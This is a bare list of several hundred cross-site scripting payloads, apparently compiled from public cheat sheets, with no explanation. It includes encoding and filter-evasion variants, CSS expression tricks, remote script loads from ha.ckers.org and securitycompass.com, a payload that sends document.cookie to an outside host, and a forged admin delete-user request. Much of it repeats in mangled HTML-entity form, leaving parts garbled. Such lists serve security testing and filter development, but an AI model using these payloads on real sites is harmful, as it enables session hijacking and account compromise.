&lt;STYLE&gt;.XSS{background-image:url(&quot;javascript:alert(&apos;XSS&apos;)&quot;);}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;
 
&lt;STYLE type=&quot;text/css&quot;&gt;BODY{background:url(&quot;javascript:alert(&apos;XSS&apos;)&quot;)}&lt;/STYLE&gt;
 
&lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
 
&lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;http://ha.ckers.org/xss.css&quot;&gt;
 
&lt;STYLE&gt;@import&apos;http://ha.ckers.org/xss.css&apos;;&lt;/STYLE&gt;
 
&lt;META HTTP-EQUIV=&quot;Link&quot; Content=&quot;&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet&quot;&gt;
 
&lt;STYLE&gt;BODY{-moz-binding:url(&quot;http://ha.ckers.org/xssmoz.xml#xss&quot;)}&lt;/STYLE&gt;
 
&lt;TABLE BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/TABLE&gt;
 
&lt;TABLE&gt;&lt;TD BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/TD&gt;&lt;/TABLE&gt;
 
&lt;HTML xmlns:xss&gt;
 
&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=&quot;javas]]&gt;&lt;![CDATA[cript:alert(&apos;XSS&apos;);&quot;&gt;]]&gt;
 
&lt;XML ID=&quot;xss&quot;&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=&quot;javas&lt;!-- --&gt;cript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;
 
&lt;XML SRC=&quot;http://ha.ckers.org/xsstest.xml&quot; ID=I&gt;&lt;/XML&gt;
 
&lt;HTML&gt;&lt;BODY&gt;
 
&lt;!--[if gte IE 4]&gt;             
 
&lt;META HTTP-EQUIV=&quot;Set-Cookie&quot; Content=&quot;USERID=&lt;SCRIPT&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt;&quot;&gt;
 
&lt;XSS STYLE=&quot;behavior: url(http://ha.ckers.org/xss.htc);&quot;&gt;
 
&lt;SCRIPT SRC=&quot;http://ha.ckers.org/xss.jpg&quot;&gt;&lt;/SCRIPT&gt;
 
&lt;!--#exec cmd=&quot;/bin/echo &apos;&lt;SCRIPT SRC&apos;&quot;--&gt;&lt;!--#exec cmd=&quot;/bin/echo &apos;=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;&apos;&quot;--&gt;
 
&lt;? echo(&apos;&lt;SCR)&apos;;
 
&lt;BR SIZE=&quot;&amp;{alert(&apos;XSS&apos;)}&quot;&gt;
 
&lt;IMG SRC=JaVaScRiPt:alert(&apos;XSS&apos;)&gt;
 
&lt;IMG SRC=javascript:alert(&amp;quot;XSS&amp;quot;)&gt;
 
&lt;IMG SRC=`javascript:alert(&quot;RSnake says, &apos;XSS&apos;&quot;)`&gt;
 
&lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;
 
&lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;
 
&lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;
 
&lt;DIV STYLE=&quot;background-image:\0075\0072\006C\0028&apos;\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029&apos;\0029&quot;&gt;
 
&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;
 
&lt;HEAD&gt;&lt;META HTTP-EQUIV=&quot;CONTENT-TYPE&quot; CONTENT=&quot;text/html; charset=UTF-7&quot;&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert(&apos;XSS&apos;);+ADw-/SCRIPT+AD4-
 
\&quot;;alert(&apos;XSS&apos;);//
 
&lt;/TITLE&gt;&lt;SCRIPT&gt;alert("XSS");&lt;/SCRIPT&gt;
 
&lt;STYLE&gt;@im\port&apos;\ja\vasc\ript:alert(&quot;XSS&quot;)&apos;;&lt;/STYLE&gt;
 
&lt;IMG SRC=&quot;jav&#x09;ascript:alert(&apos;XSS&apos;);&quot;&gt;
 
&lt;IMG SRC=&quot;jav&amp;#x09;ascript:alert(&apos;XSS&apos;);&quot;&gt;
 
&lt;IMG SRC=&quot;jav&amp;#x0A;ascript:alert(&apos;XSS&apos;);&quot;&gt;
 
&lt;IMG SRC=&quot;jav&amp;#x0D;ascript:alert(&apos;XSS&apos;);&quot;&gt;
 
&lt;IMG&#x0D;SRC&#x0D;=&#x0D;&quot;&#x0D;j&#x0D;a&#x0D;v&#x0D;a&#x0D;s&#x0D;c&#x0D;r&#x0D;i&#x0D;p&#x0D;t&#x0D;:&#x0D;a&#x0D;l&#x0D;e&#x0D;r&#x0D;t&#x0D;(&#x0D;&apos;&#x0D;X&#x0D;S&#x0D;S&#x0D;&apos;&#x0D;)&#x0D;&quot;&#x0D;&gt;&#x0D;
 
perl -e &apos;print &quot;&lt;IMG SRC=java\0script:alert(&quot;XSS&quot;)>&quot;;&apos;&gt; out
 
perl -e &apos;print &quot;&amp;&lt;SCR\0IPT&gt;alert(&quot;XSS&quot;)&lt;/SCR\0IPT&gt;&quot;;&apos; &gt; out
 
&lt;IMG SRC=&quot; &amp;#14;  javascript:alert(&apos;XSS&apos;);&quot;&gt;
 
&lt;SCRIPT/XSS SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
 
&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(&quot;XSS&quot;)&gt;
 
&lt;SCRIPT SRC=http://ha.ckers.org/xss.js
 
&lt;SCRIPT SRC=//ha.ckers.org/.j&gt;
 
&lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;)&quot;
 
&lt;IFRAME SRC=http://ha.ckers.org/scriptlet.html &lt;
 
&lt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;);//&lt;&lt;/SCRIPT&gt;
 
&lt;IMG &quot;&quot;&quot;&gt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;&quot;&gt;
 
&lt;SCRIPT&gt;a=/XSS/
 
&lt;SCRIPT a=&quot;&gt;&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
 
&lt;SCRIPT =&quot;blah&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
 
&lt;SCRIPT a=&quot;blah&quot; &apos;&apos; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
 
&lt;SCRIPT &quot;a=&apos;&gt;&apos;&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
 
&lt;SCRIPT a=`&gt;` SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
 
&lt;SCRIPT&gt;document.write(&quot;&lt;SCRI&quot;);&lt;/SCRIPT&gt;PT SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
 
&lt;SCRIPT a=&quot;>&apos;>&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
 
&lt;A HREF=&quot;http://66.102.7.147/&quot;&gt;XSS&lt;/A&gt;
 
&lt;A HREF=&quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&quot;&gt;XSS&lt;/A&gt;
 
&lt;A HREF=&quot;http://1113982867/&quot;&gt;XSS&lt;/A&gt;
 
&lt;A HREF=&quot;http://0x42.0x0000066.0x7.0x93/&quot;&gt;XSS&lt;/A&gt;
 
&lt;A HREF=&quot;http://0102.0146.0007.00000223/&quot;&gt;XSS&lt;/A&gt;
 
&lt;A HREF=&quot;h&#x0A;tt&#09;p://6&amp;#09;6.000146.0x7.147/&quot;&gt;XSS&lt;/A&gt;
 
&lt;A HREF=&quot;//www.google.com/&quot;&gt;XSS&lt;/A&gt;
 
&lt;A HREF=&quot;//google&quot;&gt;XSS&lt;/A&gt;
 
&lt;A HREF=&quot;http://ha.ckers.org@google&quot;&gt;XSS&lt;/A&gt;
 
&lt;A HREF=&quot;http://google:ha.ckers.org&quot;&gt;XSS&lt;/A&gt;
 
&lt;A HREF=&quot;http://google.com/&quot;&gt;XSS&lt;/A&gt;
 
&lt;A HREF=&quot;http://www.google.com./&quot;&gt;XSS&lt;/A&gt;
 
&lt;A HREF=&quot;javascript:document.location=&apos;http://www.google.com/&apos;&quot;&gt;XSS&lt;/A&gt;
 
&lt;A HREF=&quot;http://www.gohttp://www.google.com/ogle.com/&quot;&gt;XSS&lt;/A&gt;
 
<script>document.vulnerable=true;</script>
 
<img SRC="jav ascript:document.vulnerable=true;">
 
<img SRC="javascript:document.vulnerable=true;">
 
<img SRC=" &#14; javascript:document.vulnerable=true;">
 
<body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;>
 
<<SCRIPT>document.vulnerable=true;//<</SCRIPT>
 
<script <B>document.vulnerable=true;</script>
 
<img SRC="javascript:document.vulnerable=true;"
 
<iframe src="javascript:document.vulnerable=true; <
 
<script>a=/XSS/\ndocument.vulnerable=true;</script>
 
\";document.vulnerable=true;;//
 
</title><SCRIPT>document.vulnerable=true;</script>
 
<input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;">
 
<body BACKGROUND="javascript:document.vulnerable=true;">
 
<body ONLOAD=document.vulnerable=true;>
 
<img DYNSRC="javascript:document.vulnerable=true;">
 
<img LOWSRC="javascript:document.vulnerable=true;">
 
<bgsound SRC="javascript:document.vulnerable=true;">
 
<br SIZE="&{document.vulnerable=true}">
 
<LAYER SRC="javascript:document.vulnerable=true;"></LAYER>
 
<link REL="stylesheet" HREF="javascript:document.vulnerable=true;">
 
<style>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS
 
<img SRC='vbscript:document.vulnerable=true;'>
 
1script3document.vulnerable=true;1/script3
 
<meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;">
 
<meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:document.vulnerable=true;">
 
<IFRAME SRC="javascript:document.vulnerable=true;"></iframe>
 
<FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></frameset>
 
<table BACKGROUND="javascript:document.vulnerable=true;">
 
<table><TD BACKGROUND="javascript:document.vulnerable=true;">
 
<div STYLE="background-image: url(javascript:document.vulnerable=true;)">
 
<div STYLE="background-image: url(&#1;javascript:document.vulnerable=true;)">
 
<div STYLE="width: expression(document.vulnerable=true);">
 
<style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style>
 
<img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)">
 
<XSS STYLE="xss:expression(document.vulnerable=true)">
 
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'>
 
<style TYPE="text/javascript">document.vulnerable=true;</style>
 
<style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></a>
 
<style type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</style>
 
<!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]-->
 
<base HREF="javascript:document.vulnerable=true;//">
 
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object>
 
<XML ID=I><X><C><![<IMG SRC="javas]]<![cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span>
 
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></span>
 
<html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></html>
 
<? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?>
 
<meta HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>">
 
<head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-
 
<a href="javascript#document.vulnerable=true;">
 
<div onmouseover="document.vulnerable=true;">
 
<img src="javascript:document.vulnerable=true;">
 
<img dynsrc="javascript:document.vulnerable=true;">
 
<input type="image" dynsrc="javascript:document.vulnerable=true;">
 
<bgsound src="javascript:document.vulnerable=true;">
 
&<script>document.vulnerable=true;</script>
 
&{document.vulnerable=true;};
 
<img src=&{document.vulnerable=true;};>
 
<link rel="stylesheet" href="javascript:document.vulnerable=true;">
 
<iframe src="vbscript:document.vulnerable=true;">
 
<img src="mocha:document.vulnerable=true;">
 
<img src="livescript:document.vulnerable=true;">
 
<a href="about:<script>document.vulnerable=true;</script>">
 
<meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;">
 
<body onload="document.vulnerable=true;">
 
<div style="background-image: url(javascript:document.vulnerable=true;);">
 
<div style="behaviour: url([link to code]);">
 
<div style="binding: url([link to code]);">
 
<div style="width: expression(document.vulnerable=true;);">
 
<style type="text/javascript">document.vulnerable=true;</style>
 
<object classid="clsid:..." codebase="javascript:document.vulnerable=true;">
 
<style><!--</style><script>document.vulnerable=true;//--></script>
 
<<script>document.vulnerable=true;</script>
 
<![<!--]]<script>document.vulnerable=true;//--></script>
 
<!-- -- --><script>document.vulnerable=true;</script><!-- -- -->
 
<img src="blah"onmouseover="document.vulnerable=true;">
 
<img src="blah>" onmouseover="document.vulnerable=true;">
 
<xml src="javascript:document.vulnerable=true;">
 
<xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml>
 
<div datafld="b" dataformatas="html" datasrc="#X"></div>
 
[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>
 
<style>@import'http://www.securitycompass.com/xss.css';</style>
 
<meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet">
 
<style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style>
 
<OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object>
 
<HTML xmlns:xss><?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html>
 
<script SRC="http://www.securitycompass.com/xss.jpg"></script>
 
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'"-->
 
<script a=">" SRC="http://www.securitycompass.com/xss.js"></script>
 
<script =">" SRC="http://www.securitycompass.com/xss.js"></script>
 
<script a=">" '' SRC="http://www.securitycompass.com/xss.js"></script>
 
<script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script>
 
<script a=`>` SRC="http://www.securitycompass.com/xss.js"></script>
 
<script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script>
 
<script>document.write("<SCRI");</SCRIPT>PT SRC="http://www.securitycompass.com/xss.js"></script>
 
<div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla]
 
&quot;&gt;&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(&quot;XSS&quot;)&gt;
 
&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;
 
&lt;/br style=a:expression(alert())&gt;
 
&lt;scrscriptipt&gt;alert(1)&lt;/scrscriptipt&gt;
 
&lt;br size=\&quot;&amp;{alert(&#039;XSS&#039;)}\&quot;&gt;
 
perl -e &#039;print \&quot;&lt;IMG SRC=java\0script:alert(\&quot;XSS\&quot;)&gt;\&quot;;&#039; &gt; out
 
perl -e &#039;print \&quot;&lt;SCR\0IPT&gt;alert(\&quot;XSS\&quot;)&lt;/SCR\0IPT&gt;\&quot;;&#039; &gt; out
 
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
 
<~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)>
 
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
 
<~/XSS STYLE=xss:expression(alert('XSS'))>
 
"><script>alert('XSS')</script>
 
</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
 
XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
 
XSS STYLE=xss:e/**/xpression(alert('XSS'))>
 
</XSS STYLE=xss:expression(alert('XSS'))>
 
';;alert(String.fromCharCode(88,83,83))//\';;alert(String.fromCharCode(88,83,83))//";;alert(String.fromCharCode(88,83,83))//\";;alert(String.fromCharCode(88,83,83))//-->;<;/SCRIPT>;";>;';>;<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>;
 
';';;!--";<;XSS>;=&;{()}
 
<;SCRIPT>;alert(';XSS';)<;/SCRIPT>;
 
<;SCRIPT SRC=http://ha.ckers.org/xss.js>;<;/SCRIPT>;
 
<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>;
 
<;BASE HREF=";javascript:alert(';XSS';);//";>;
 
<;BGSOUND SRC=";javascript:alert(';XSS';);";>;
 
<;BODY BACKGROUND=";javascript:alert(';XSS';);";>;
 
<;BODY ONLOAD=alert(';XSS';)>;
 
<;DIV STYLE=";background-image: url(javascript:alert(';XSS';))";>;
 
<;DIV STYLE=";background-image: url(&;#1;javascript:alert(';XSS';))";>;
 
<;DIV STYLE=";width: expression(alert(';XSS';));";>;
 
<;FRAMESET>;<;FRAME SRC=";javascript:alert(';XSS';);";>;<;/FRAMESET>;
 
<;IFRAME SRC=";javascript:alert(';XSS';);";>;<;/IFRAME>;
 
<;INPUT TYPE=";IMAGE"; SRC=";javascript:alert(';XSS';);";>;
 
<;IMG SRC=";javascript:alert(';XSS';);";>;
 
<;IMG SRC=javascript:alert(';XSS';)>;
 
<;IMG DYNSRC=";javascript:alert(';XSS';);";>;
 
<;IMG LOWSRC=";javascript:alert(';XSS';);";>;
 
<;IMG SRC=";http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode";>;
 
Redirect 302 /a.jpg http://victimsite.com/admin.asp&;deleteuser
 
exp/*<;XSS STYLE=';no\xss:noxss(";*//*";);
 
<;STYLE>;li {list-style-image: url(";javascript:alert(&#39;XSS&#39;)";);}<;/STYLE>;<;UL>;<;LI>;XSS
 
<;IMG SRC=';vbscript:msgbox(";XSS";)';>;
 
<;LAYER SRC=";http://ha.ckers.org/scriptlet.html";>;<;/LAYER>;
 
<;IMG SRC=";livescript:[code]";>;
 
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
 
<;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=javascript:alert(';XSS';);";>;
 
<;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K";>;
 
<;META HTTP-EQUIV=";refresh"; CONTENT=";0; URL=http://;URL=javascript:alert(';XSS';);";>;
 
<;IMG SRC=";mocha:[code]";>;
 
<;OBJECT TYPE=";text/x-scriptlet"; DATA=";http://ha.ckers.org/scriptlet.html";>;<;/OBJECT>;
 
<;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>;<;param name=url value=javascript:alert(';XSS';)>;<;/OBJECT>;
 
<;EMBED SRC=";http://ha.ckers.org/xss.swf"; AllowScriptAccess=";always";>;<;/EMBED>;
 
a=";get";;&;#10;b=";URL(";";;&;#10;c=";javascript:";;&;#10;d=";alert(';XSS';);";)";;&#10;eval(a+b+c+d);
 
<;STYLE TYPE=";text/javascript";>;alert(';XSS';);<;/STYLE>;
 
<;IMG STYLE=";xss:expr/*XSS*/ession(alert(';XSS';))";>;
 
<;XSS STYLE=";xss:expression(alert(';XSS';))";>;
 
<;STYLE>;.XSS{background-image:url(";javascript:alert(';XSS';)";);}<;/STYLE>;<;A CLASS=XSS>;<;/A>;
 
<;STYLE type=";text/css";>;BODY{background:url(";javascript:alert(';XSS';)";)}<;/STYLE>;
 
<;LINK REL=";stylesheet"; HREF=";javascript:alert(';XSS';);";>;
 
<;LINK REL=";stylesheet"; HREF=";http://ha.ckers.org/xss.css";>;
 
<;STYLE>;@import';http://ha.ckers.org/xss.css';;<;/STYLE>;
 
<;META HTTP-EQUIV=";Link"; Content=";<;http://ha.ckers.org/xss.css>;; REL=stylesheet";>;
 
<;STYLE>;BODY{-moz-binding:url(";http://ha.ckers.org/xssmoz.xml#xss";)}<;/STYLE>;
 
<;TABLE BACKGROUND=";javascript:alert(';XSS';)";>;<;/TABLE>;
 
<;TABLE>;<;TD BACKGROUND=";javascript:alert(';XSS';)";>;<;/TD>;<;/TABLE>;
 
<;HTML xmlns:xss>;
 
<;XML ID=I>;<;X>;<;C>;<;![CDATA[<;IMG SRC=";javas]]>;<;![CDATA[cript:alert(';XSS';);";>;]]>;
 
<;XML ID=";xss";>;<;I>;<;B>;<;IMG SRC=";javas<;!-- -->;cript:alert(';XSS';)";>;<;/B>;<;/I>;<;/XML>;
 
<;XML SRC=";http://ha.ckers.org/xsstest.xml"; ID=I>;<;/XML>;
 
<;HTML>;<;BODY>;
 
<;!--[if gte IE 4]>;         
 
<;META HTTP-EQUIV=";Set-Cookie"; Content=";USERID=<;SCRIPT>;alert(';XSS';)<;/SCRIPT>;";>;
 
<;XSS STYLE=";behavior: url(http://ha.ckers.org/xss.htc);";>;
 
<;SCRIPT SRC=";http://ha.ckers.org/xss.jpg";>;<;/SCRIPT>;
 
<;!--#exec cmd=";/bin/echo ';<;SCRIPT SRC';";-->;<;!--#exec cmd=";/bin/echo ';=http://ha.ckers.org/xss.js>;<;/SCRIPT>;';";-->;
 
<;? echo(';<;SCR)';;
 
<;BR SIZE=";&;{alert(';XSS';)}";>;
 
<;IMG SRC=JaVaScRiPt:alert(';XSS';)>;
 
<;IMG SRC=javascript:alert(&;quot;XSS&;quot;)>;
 
<;IMG SRC=`javascript:alert(";RSnake says, ';XSS';";)`>;
 
<;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>;
 
<;IMG RC=&;#106;&;#97;&;#118;&;#97;&;#115;&;#99;&;#114;&;#105;&;#112;&;#116;&;#58;&;#97;&;#108;&;#101;&;#114;&;#116;&;#40;&;#39;&;#88;&;#83;&;#83;&;#39;&;#41;>;
 
<;IMG RC=&;#0000106&;#0000097&;#0000118&;#0000097&;#0000115&;#0000099&;#0000114&;#0000105&;#0000112&;#0000116&;#0000058&;#0000097&;#0000108&;#0000101&;#0000114&;#0000116&;#0000040&;#0000039&;#0000088&;#0000083&;#0000083&;#0000039&;#0000041>;
 
<;DIV STYLE=";background-image:\0075\0072\006C\0028';\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.10530053\0027\0029';\0029";>;
 
<;IMG SRC=&;#x6A&;#x61&;#x76&;#x61&;#x73&;#x63&;#x72&;#x69&;#x70&;#x74&;#x3A&;#x61&;#x6C&;#x65&;#x72&;#x74&;#x28&;#x27&;#x58&;#x53&;#x53&;#x27&;#x29>;
 
<;HEAD>;<;META HTTP-EQUIV=";CONTENT-TYPE"; CONTENT=";text/html; charset=UTF-7";>; <;/HEAD>;+ADw-SCRIPT+AD4-alert(';XSS';);+ADw-/SCRIPT+AD4-
 
\";;alert(';XSS';);//
 
<;/TITLE>;<;SCRIPT>;alert("XSS");<;/SCRIPT>;
 
<;STYLE>;@im\port';\ja\vasc\ript:alert(";XSS";)';;<;/STYLE>;
 
<;IMG SRC=";jav&#x09;ascript:alert(';XSS';);";>;
 
<;IMG SRC=";jav&;#x09;ascript:alert(';XSS';);";>;
 
<;IMG SRC=";jav&;#x0A;ascript:alert(';XSS';);";>;
 
<;IMG SRC=";jav&;#x0D;ascript:alert(';XSS';);";>;
 
<;IMG&#x0D;SRC&#x0D;=&#x0D;";&#x0D;j&#x0D;a&#x0D;v&#x0D;a&#x0D;s&#x0D;c&#x0D;r&#x0D;i&#x0D;p&#x0D;t&#x0D;:&#x0D;a&#x0D;l&#x0D;e&#x0D;r&#x0D;t&#x0D;&#x0D;';&#x0D;X&#x0D;S&#x0D;S&#x0D;';&#x0D;)&#x0D;";&#x0D;>;&#x0D;
 
perl -e ';print ";<;IM SRC=java\0script:alert(";XSS";)>";;';>; out
 
perl -e ';print ";&;<;SCR\0IPT>;alert(";XSS";)<;/SCR\0IPT>;";;'; >; out
 
<;IMG SRC="; &;#14;  javascript:alert(';XSS';);";>;
 
<;SCRIPT/XSS SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
 
<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>;
 
<;SCRIPT SRC=http://ha.ckers.org/xss.js
 
<;SCRIPT SRC=//ha.ckers.org/.j>;
 
<;IMG SRC=";javascript:alert(';XSS';)";
 
<;IFRAME SRC=http://ha.ckers.org/scriptlet.html <;
 
<;<;SCRIPT>;alert(";XSS";);//<;<;/SCRIPT>;
 
<;IMG ";";";>;<;SCRIPT>;alert(";XSS";)<;/SCRIPT>;";>;
 
<;SCRIPT>;a=/XSS/
 
<;SCRIPT a=";>;"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
 
<;SCRIPT =";blah"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
 
<;SCRIPT a=";blah"; ';'; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
 
<;SCRIPT ";a=';>;';"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
 
<;SCRIPT a=`>;` SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
 
<;SCRIPT>;document.write(";<;SCRI";);<;/SCRIPT>;PT SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
 
<;SCRIPT a=";>';>"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
 
<;A HREF=";http://66.102.7.147/";>;XSS<;/A>;
 
<;A HREF=";http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D";>;XSS<;/A>;
 
<;A HREF=";http://1113982867/";>;XSS<;/A>;
 
<;A HREF=";http://0x42.0x0000066.0x7.0x93/";>;XSS<;/A>;
 
<;A HREF=";http://0102.0146.0007.00000223/";>;XSS<;/A>;
 
<;A HREF=";h&#x0A;tt&#09;p://6&;#09;6.000146.0x7.147/";>;XSS<;/A>;
 
<;A HREF=";//www.google.com/";>;XSS<;/A>;
 
<;A HREF=";//google";>;XSS<;/A>;
 
<;A HREF=";http://ha.ckers.org@google";>;XSS<;/A>;
 
<;A HREF=";http://google:ha.ckers.org";>;XSS<;/A>;
 
<;A HREF=";http://google.com/";>;XSS<;/A>;
 
<;A HREF=";http://www.google.com./";>;XSS<;/A>;
 
<;A HREF=";javascript:document.location=';http://www.google.com/';";>;XSS<;/A>;
 
<;A HREF=";http://www.gohttp://www.google.com/ogle.com/";>;XSS<;/A>;
 
<script>document.vulnerable=true;</script>
 
<img SRC="jav ascript:document.vulnerable=true;">
 
<img SRC="javascript:document.vulnerable=true;">
 
<img SRC=" &#14; javascript:document.vulnerable=true;">
 
<body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;>
 
<<SCRIPT>document.vulnerable=true;//<</SCRIPT>
 
<script <B>document.vulnerable=true;</script>
 
<img SRC="javascript:document.vulnerable=true;"
 
<iframe src="javascript:document.vulnerable=true; <
 
<script>a=/XSS/\ndocument.vulnerable=true;</script>
 
\";document.vulnerable=true;;//
 
</title><SCRIPT>document.vulnerable=true;</script>
 
<input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;">
 
<body BACKGROUND="javascript:document.vulnerable=true;">
 
<body ONLOAD=document.vulnerable=true;>
 
<img DYNSRC="javascript:document.vulnerable=true;">
 
<img LOWSRC="javascript:document.vulnerable=true;">
 
<bgsound SRC="javascript:document.vulnerable=true;">
 
<br SIZE="&{document.vulnerable=true}">
 
<LAYER SRC="javascript:document.vulnerable=true;"></LAYER>
 
<link REL="stylesheet" HREF="javascript:document.vulnerable=true;">
 
<style>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS
 
<img SRC='vbscript:document.vulnerable=true;'>
 
1script3document.vulnerable=true;1/script3
 
<meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;">
 
